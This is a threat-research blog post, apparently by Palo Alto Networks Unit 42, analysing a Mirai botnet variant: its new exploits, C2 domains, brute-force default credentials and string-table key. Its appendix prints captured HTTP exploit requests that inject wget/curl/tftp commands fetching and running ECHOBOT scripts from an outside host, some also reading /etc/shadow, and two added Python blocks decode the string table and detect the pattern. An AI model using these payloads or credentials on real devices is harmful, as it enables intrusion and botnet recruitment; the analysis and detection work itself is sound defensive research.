# New Mirai Variant Adds 8 New Exploits, Targets Additional IoT Devices

**[unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/](https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/)**

Ruchna Nigam, June 7, 2019

By [Ruchna Nigam](https://unit42.paloaltonetworks.com/author/ruchna-nigam/), June 6, 2019 at 5:00 PM

Category: [Unit 42](https://unit42.paloaltonetworks.com/category/unit42/)

Tags: [CVE-2017-5174](https://unit42.paloaltonetworks.com/tag/cve-2017-5174/), [CVE-2018-11510](https://unit42.paloaltonetworks.com/tag/cve-2018-11510/), [CVE-2018-17173](https://unit42.paloaltonetworks.com/tag/cve-2018-17173/), [CVE-2018-6961](https://unit42.paloaltonetworks.com/tag/cve-2018-6961/), [CVE-2019-2725](https://unit42.paloaltonetworks.com/tag/cve-2019-2725/), [CVE-2019-3929](https://unit42.paloaltonetworks.com/tag/cve-2019-3929/), [exploits](https://unit42.paloaltonetworks.com/tag/exploits/), [IoT](https://unit42.paloaltonetworks.com/tag/iot/), [Linux](https://unit42.paloaltonetworks.com/tag/linux/), [Mirai](https://unit42.paloaltonetworks.com/tag/mirai/)

This post is also available in: [日本語 (Japanese)](https://unit42.paloaltonetworks.jp/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/)

## Executive Summary

Palo Alto Networks Unit 42 has been tracking the evolution of the [Mirai malware](https://unit42.paloaltonetworks.com/tag/mirai/), known for targeting embedded devices with the primary intent of launching DDoS attacks and self-propagation, since 2016, when it took down several notable targets. As part of this ongoing research, we have recently discovered a new variant of Mirai that carries eight new exploits against a wide range of embedded devices. The newly targeted devices range from wireless presentation systems to set-top boxes, SD-WANs and even smart home controllers.

Mirai initially made use of default credentials to gain access to devices.
However, since the end of 2017, [samples of the family have](https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm/) increasingly been observed making use of publicly available exploits to propagate and run on vulnerable devices. [2018 saw a continued increase in campaigns involving variants that incorporate several exploits within the same sample](https://unit42.paloaltonetworks.com/unit42-iot-malware-evolves-harvest-bots-exploiting-zero-day-home-router-vulnerability/), allowing several different kinds of IoT devices to be harvested into the same botnet. Since then we have also observed Mirai malware authors [experimenting with new exploits](https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/), [found on the publicly available exploit-db](https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/), to gauge the gains in bot count from their use. The latest variant we have observed, detailed in this post, appears to be a continuation of the same trend.

## Exploits

This latest variant contains a total of 18 exploits, 8 of which are new to Mirai. The vulnerabilities being exploited in the wild by this Mirai variant for the first time are listed below, with more details in Table 1 in the Appendix:

The new samples also include four exploits which have only been used by Mirai in the past:

These new samples also include exploits targeting the [Oracle WebLogic Servers RCE vulnerability, which has been used by both Linux and Windows botnets](https://unit42.paloaltonetworks.com/muhstik-botnet-exploits-the-latest-weblogic-vulnerability-for-cryptomining-and-ddos-attacks/). All of the exploits that have already been seen exploited by Mirai in the past are listed in Table 3 in the Appendix.
## Analysis

The new variant we have discovered has other distinguishing features besides the exploits mentioned above. The encryption key used for the string table is 0xDFDAACFD, which is equivalent to a byte-wise XOR with 0x54 under the [standard encryption scheme (as implemented in the toggle_obf function) used in the original Mirai source code](https://github.com/jgamblin/Mirai-Source-Code/blob/6a5941be681b839eeff8ece1de8b245bcd5ffb02/mirai/bot/table.c#L138).

There are several default credentials used for brute force that we have not come across previously in our research (though we cannot confirm this is their first use with Mirai). These are listed in Table 2 in the Appendix along with the devices that make use of them; of note, all of these credentials can be found online.

## Infrastructure

The samples were available at an open directory, pictured in Figure 1.

_Figure 1. Open directory hosting Mirai variant_

Samples of this variant use two domains for C2, at different ports in the different versions, as explained below. The latest version makes use of the following two domains for C2:

- akuma[.]pw:17
- akumaiotsolutions[.]pw:912

While the two domains don't currently resolve to any IP, a Shodan search for the IP address hosting the samples indicates that port 17 at that address was used for C2 at some point in time. This is seen in the response recorded from port 17 in the screenshot, which is the expected [response from a Mirai C2 server based on how the C2 code is written in the original source code](https://github.com/jgamblin/Mirai-Source-Code/blob/3273043e1ef9c0bb41bd9fcdc5317f7b797a2a94/mirai/cnc/admin.go).

_Figure 2. Shodan search result indicating 31.13.195[.]251:17 was used for C2 at one point_

The directory hosting the malware was updated a couple of times before the final version was uploaded at 26-May-2019 10:05 (server time).
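To make the key equivalence from the Analysis section concrete: the original Mirai `table.c` `toggle_obf()` XORs each byte of a string-table entry with the four bytes of the 32-bit key one after another, so any 32-bit table key collapses to a single byte, the XOR of its four bytes. The Python below is an added example (not code from this post or from the Mirai source) that reimplements that arithmetic, checks it against the 0xDFDAACFD key reported above, and shows how an analyst can recover the byte from an encoded table alone when a variant has changed the key. The encoded entries are constructed for the example.

```python
"""Effective XOR key behind a Mirai string-table key (added example)."""


def effective_xor_key(table_key: int) -> int:
    """Collapse a 32-bit Mirai table key to the single byte it really applies.

    toggle_obf() in the original table.c XORs each byte with k1, k2, k3 and k4
    (the four bytes of the key) in turn, which equals one XOR with k1^k2^k3^k4.
    """
    k1 = table_key & 0xFF
    k2 = (table_key >> 8) & 0xFF
    k3 = (table_key >> 16) & 0xFF
    k4 = (table_key >> 24) & 0xFF
    return k1 ^ k2 ^ k3 ^ k4


def toggle_obf(data: bytes, table_key: int) -> bytes:
    """Encode or decode one table entry; XOR is its own inverse."""
    key = effective_xor_key(table_key)
    return bytes(b ^ key for b in data)


def decode_table(entries, table_key: int) -> list:
    """Decode encoded entries and strip the trailing NUL the table stores."""
    return [
        toggle_obf(enc, table_key).rstrip(b"\x00").decode("ascii", "replace")
        for enc in entries
    ]


def recover_key(entries) -> int:
    """Find the single-byte key from encoded entries alone.

    Table entries are NUL-terminated printable ASCII, so the byte that turns
    every ciphertext byte into printable ASCII or NUL is the key. This is the
    check to run when a sample's key differs from the one in the leaked source.
    """
    blob = b"".join(entries)

    def printable_count(key: int) -> int:
        return sum(1 for b in blob if (b ^ key) == 0 or 0x20 <= (b ^ key) <= 0x7E)

    return max(range(256), key=printable_count)


VARIANT_KEY = 0xDFDAACFD   # key reported in this post; collapses to 0x54
ORIGINAL_KEY = 0xDEADBEEF  # key in the leaked Mirai source; collapses to 0x22

# Constructed sample: two plaintexts encoded with the variant's key, the way
# an analyst would find them in the binary before decoding.
SAMPLE_ENTRIES = [
    toggle_obf(b"/proc/\x00", VARIANT_KEY),
    toggle_obf(b"TSource Engine Query\x00", VARIANT_KEY),
]

if __name__ == "__main__":
    print(hex(effective_xor_key(VARIANT_KEY)))
    print(hex(effective_xor_key(ORIGINAL_KEY)))
    print(hex(recover_key(SAMPLE_ENTRIES)))
    print(decode_table(SAMPLE_ENTRIES, VARIANT_KEY))
```

`recover_key` does not need the 32-bit key at all: because the scheme collapses to one byte, 256 trials against the printable-ASCII property are enough, which is why a changed table key is a weak distinguishing feature rather than real protection for the strings.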
Each of the updates was minor: the attackers either edited C2 port numbers or slightly updated the payload.

File upload times:

- 26-May-2019 10:05
- 21-May-2019 16:34
- 21-May-2019 08:38
- 19-May-2019 06:05

The briefly available version from May 21, 2019 at 08:38 made use of the two domains below for C2. They are the same domains as used by the other samples (uploaded on prior or later dates), but the ports are different:

- akuma[.]pw:1822
- akumaiotsolutions[.]pw:721

## Conclusion

This newly discovered variant is a continuation of efforts by Linux malware authors to scout for a wider range, and thus a larger number, of IoT devices to form larger botnets, thereby affording them greater firepower for DDoS attacks. Based on the results observed from using such variants, the exploits that are more effective, i.e. the ones that infect a greater number of devices, are retained or reused in future variants, whereas the less effective ones are retired or replaced by the malware authors with other exploits.

Palo Alto Networks customers are protected by:

- WildFire, which detects all related samples with malicious verdicts
- Threat Prevention and PAN-DB, which block all exploits and IPs/URLs used by this variant
AutoFocus customers can track these activities using individual exploit tags:

- [CVE-2019-3929](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2019-3929)
- [OpenDreamBox_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.OpenDreamBox_RCE)
- [CVE-2018-6961](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-6961)
- [CVE-2018-7841](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-7841)
- [CVE-2018-11510](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-11510)
- [DellKACE_SysMgmtApp_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DellKACE_SysMgmtApp_RCE)
- [CVE-2017-5174](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2017-5174)
- [HooTooTripMate_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.HooTooTripMate_RCE)
- [BelkinWeMoRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.BelkinWeMoRCE)
- [MiCasaVeraLiteRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.MiCasaVeraLiteRCE)
- [CVE-2018-17173](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-17173)
- [WePresentCmdInjection](https://autofocus.paloaltonetworks.com/#/tag/Unit42.WePresentCmdInjection)
- [ASUS DSLModem RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ASUS_DSLModem_RCE)
- [CVE-2019-2725](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2019-2725)
- [NetgearReadyNAS_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.NetgearReadyNAS_RCE)
- [CVE-2014-8361](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2014-8361)

The malware family can be tracked in AutoFocus using the tag [Mirai](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Mirai).

## Appendix

| Vulnerability | Affected Devices |
| --- | --- |
| [CVE-2019-3929](https://www.exploit-db.com/exploits/46786) | Wireless Presentation Systems from [several vendors](https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c) |
| OpenDreamBox [Remote Code Execution](https://www.exploit-db.com/exploits/42293) | Devices running OpenDreamBox 2.0.0, an embedded Linux distribution for set-top boxes |
| [CVE-2018-6961](https://www.exploit-db.com/exploits/44959) | VMware NSX SD-WAN Edge < 3.1.2 |
| [CVE-2018-7841](https://www.exploit-db.com/exploits/46846) | Schneider Electric U.motion LifeSpace Management Systems |
| Dell KACE Remote Code Execution | Dell KACE Systems Management Appliances |
| [CVE-2017-5174](https://www.exploit-db.com/exploits/41360) | Geutebrück IP Cameras |
| HooToo TripMate Remote Code Execution | HooToo TripMate Routers |
| CVE-2018-11510 | Asustor NAS Devices |

Exploit formats (Table 1):

CVE-2019-3929:

```
POST /cgi-bin/file_transfer.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

file_transfer=new&dir='Pa_Notecd wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*Pa_Note
```

OpenDreamBox Remote Code Execution:

```
POST /webadmin/script?command=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
```

CVE-2018-6961 (three request bodies, one per diagnostic test):

```
POST /scripts/ajaxPortal.lua HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.vmware.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: culture=en-us
Connection: close

destination=8.8.8.8$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&source=192.168.0.1&test=TRACEROUTE&requestTimeout=900&auth_token=&_cmd=run_dia

name=google.com$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic

destination=8.8.8.8$(cat /etc/shadow |wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagn
```

CVE-2018-7841:

```
POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

op=export&language=english&interval=1&object_id=\x60wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\x60
```

Dell KACE Remote Code Execution:

```
POST /service/krashrpt.php HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept: */*
User-Agent: Hello-World
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

kuid=\x60id | wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*\x60
```

CVE-2017-5174:

```
POST /uapi-cgi/viewer/testaction.cgi HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
ip: eth0 1.1.1.1; wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmo ECHOBOT.sh; sh ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpg anonymous -p anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.*
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
```

HooToo TripMate Remote Code Execution:

```
POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; ECHOBOT.sh; tftp 31.13.195[.]251 -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous anonymous -P 21 31.13.195[.]251 ECHOBOT1.sh ECHOBOT1.sh; sh ECHOBOT1.sh; rm -rf ECHOBOT.* H
Content-Length: 630
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
```

_Table 1. New exploits used in the Mirai variant_

| Default Credentials | Affected Device(s) |
| --- | --- |
| blueangel/blueangel, root/abnareum10, root/Admin@tbroad, root/superuser | [Blue Angel Software Suite, an application that runs on embedded devices for VOIP/SIP services](https://packetstormsecurity.com/files/152720/Blue-Angel-Software-Suite-Command-Execution.html) |
| admin/wbox123 | [WBOX IP cameras, NVRs, DVRs](https://www.wboxtech.com/content/files/product_categories/ip_cameras/IPC-NVR-DVR-secure-activation.pdf) |
| admin/pfsense | [Netgate pfSense, an open source platform for traditional firewall, VPN and routing needs](https://docs.netgate.com/pfsense/en/latest/usermanager/pfsense-default-username-and-password.html) |
| admin/aerohive | [Aerohive devices, a networking hardware vendor](https://thehivecommunity.aerohive.com/s/question/0D50c00006da0wW/default-username-and-password?language=en_US) |
| root/awind5885 | [Crestron AirMedia AM-100 Presentation Gateways](https://www.exploit-db.com/exploits/40813) |
| hadoop/123456, hadoop/hadoop@123, hadoop/hadoopuser | Hadoop instances |
| root/ikwd | Toshiba IP Cameras |

_Table 2. Unusual default credentials used in the Mirai variant_

| Vulnerability | Affected Devices |
| --- | --- |
| CVE-2019-2725 | Oracle WebLogic Servers |
| CVE-2018-17173 | LG Supersign TVs |
| WePresent [Command Injection](https://www.exploit-db.com/exploits/41935) | WePresent WiPG-1000 Wireless Presentation systems |
| ASUS DSL Modem [Remote Code Execution](https://www.exploit-db.com/exploits/45135) | ASUS DSL-N12E_C1 1.1.2.3_345 |
| Belkin WeMo Remote Code Execution | Belkin WeMo Devices |
| MiCasa VeraLite [Remote Code Execution](https://www.exploit-db.com/exploits/40589) | MiCasa VeraLite Smart Home Controllers |
| Netgear ReadyNAS [Remote Code Execution](https://www.exploit-db.com/exploits/42956) | Netgear ReadyNAS / [NUUO NVRs](https://www.exploit-db.com/exploits/45070) |
| GoAhead Remote Code Execution | IP cameras manufactured by GoAhead, Aldi, and several others |
| CVE-2014-8361 | Devices using the Realtek SDK with miniigd daemon |

Exploit formats (Table 3):

CVE-2019-2725 and CVE-2018-17173 (request fragments):

```
POST /_async/AsyncResponseServiceHttps HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
User-Agent: Hello-World
Connection: close
Content-Type: text/xml

xx xmlns:work=http://bea.com/2004/06/soap/workare wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 EC 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 &1+|+;w -c get ECHOBOT.sh; chmod 777 ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; ch ECHOBOT1.sh; rm -rf ECHOBOT.*; >/tmp/f ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=
Content-Length: 630
Accept-Encoding: gzip, deflate
User-Agent: Hello-World
Host: 192.168.0.1:9080
Connection: keep-alive
```

WePresent Command Injection:

```
POST /cgi-bin/rdfs.cgi HTTP/1.1
Host: 192.168.0.1:80
application/x-www-form-urlencoded
Content-Length: 1024

Client=;wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOB ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p
```

ASUS DSL Modem Remote Code Execution:

```
GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.c g987b580&cmdMethod=ping&destIP=wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous
Host: 192.168.0.1:80
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chro
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.target.com/Main_Analysis_Content.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

Belkin WeMo Remote Code Execution:

```
POST /upnp/control/basicevent1 HTTP/1.1
Host: 20.36.21.25:49152
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
Content-Length: 393

\x60wget http://31.13.195[.]251/ECHOBOT.x -O /tmp/ECHOBOT; chmod 777 /tmp/ECHOBOT
```

MiCasa VeraLite Remote Code Execution:

```
POST /upnp/control/hag HTTP/1.1"
Host: %s:49451
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: text/xml;charset=UTF-8
MIME-Version: 1.0
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua

< http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/ECHOBOT.sh; chmod 777 ECHOBOT.sh; s chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p anonymous -P 21 31.13.195[.]251 E
```

Netgear ReadyNAS / NUUO NVR Remote Code Execution (POST and GET forms):

```
POST /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh; c ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh EC ECHOBOT.*%205;%27 HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello-World
Connection: keep-alive

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27; wget http://31.13.195[.]251/ECHOBOT.sh; cu ECHOBOT.sh; sh ECHOBOT.sh; tftp -r ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh EC HTTP/1.1
Host: 192.168.0.1:50000
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
```

GoAhead Remote Code Execution:

```
GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget http://31.13.195[.]251/ECHOBOT.sh; curl -O http://31.13.195[.]251/E ECHOBOT2.sh -g 31.13.195[.]251; chmod 777 ECHOBOT2.sh; sh ECHOBOT2.sh; ftpget -v -u anonymous -p
```

CVE-2014-8361:

```
POST /wanipcn.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping'
Accept: */*
User-Agent: Hello-World
Connection: keep-alive
```
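The exploit formats in Tables 1 and 3 share traits a defender can key on regardless of which device is being hit: the `User-Agent: Hello-World` header on most of the requests, and a parameter value that carries a `wget`/`curl`/`tftp`/`ftpget` fetch followed by `chmod 777` and `sh`. The Python below is an added example, not code from the Unit 42 post, that triages raw HTTP requests for those traits. The sample requests are constructed from the appendix patterns, with the documentation address 203.0.113.10 standing in for the real download host.

```python
"""Triage raw HTTP requests for the download-and-execute pattern (added example)."""
import re
from urllib.parse import unquote_plus

# Every payload in the appendix fetches a script with one of these tools ...
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# ... then makes it executable and runs it.
EXEC_RE = re.compile(r"\bchmod\s+777\b|\bsh\s+\S+\.sh\b")
# Shell metacharacters that let a parameter value become a command.
INJECT_RE = re.compile(r"[;|`]|\$\(")
# User-Agent carried by most of the requests in Tables 1 and 3.
SUSPICIOUS_UAS = {"hello-world"}


def parse_request(raw: str):
    """Split a raw request into (request line, header dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def analyze_request(raw: str) -> dict:
    """Return the indicators present in one request and an overall verdict."""
    request_line, headers, body = parse_request(raw)
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    # Percent-decode so "%27;%20wget" is inspected as the shell text it becomes.
    text = unquote_plus(target) + "\n" + unquote_plus(body)

    indicators = []
    if headers.get("user-agent", "").lower() in SUSPICIOUS_UAS:
        indicators.append("user_agent:Hello-World")
    if FETCH_RE.search(text) and EXEC_RE.search(text):
        indicators.append("download_and_execute_chain")
    if FETCH_RE.search(text) and INJECT_RE.search(text):
        indicators.append("command_injection_in_parameter")
    return {
        "target": target.split("?")[0],
        "indicators": indicators,
        # Require two independent traits so a lone odd User-Agent does not alert.
        "verdict": "malicious" if len(indicators) >= 2 else "benign",
    }


# Constructed samples modeled on the appendix (not captured traffic).
MALICIOUS_POST = (
    "POST /uapi-cgi/viewer/testaction.cgi HTTP/1.1\r\n"
    "Content-Length: 120\r\n"
    "Accept: */*\r\n"
    "User-Agent: Hello-World\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
    "ip=eth0 1.1.1.1; wget http://203.0.113.10/ECHOBOT.sh; "
    "chmod 777 ECHOBOT.sh; sh ECHOBOT.sh"
)
MALICIOUS_GET = (
    "GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;%20wget%20http://"
    "203.0.113.10/ECHOBOT.sh;%20chmod%20777%20ECHOBOT.sh;%20sh%20ECHOBOT.sh;%27 HTTP/1.1\r\n"
    "Host: 192.168.0.1:50000\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)
UA_ONLY = "GET /index.html HTTP/1.1\r\nUser-Agent: Hello-World\r\n\r\n"
BENIGN = (
    "POST /cgi-bin/file_transfer.cgi HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
    "file_transfer=new&dir=reports"
)

if __name__ == "__main__":
    for sample in (MALICIOUS_POST, MALICIOUS_GET, UA_ONLY, BENIGN):
        print(analyze_request(sample))
```

The two-indicator threshold is deliberate: the `Hello-World` User-Agent alone is a weak signal, and a legitimate administrative request can contain a `;` in a parameter, so the verdict hinges on the fetch-plus-execute chain appearing inside a parameter value, which is the behaviour common to all of the payloads in the appendix. Percent-decoding before matching matters because the ReadyNAS/NUUO requests encode the injected quote and spaces.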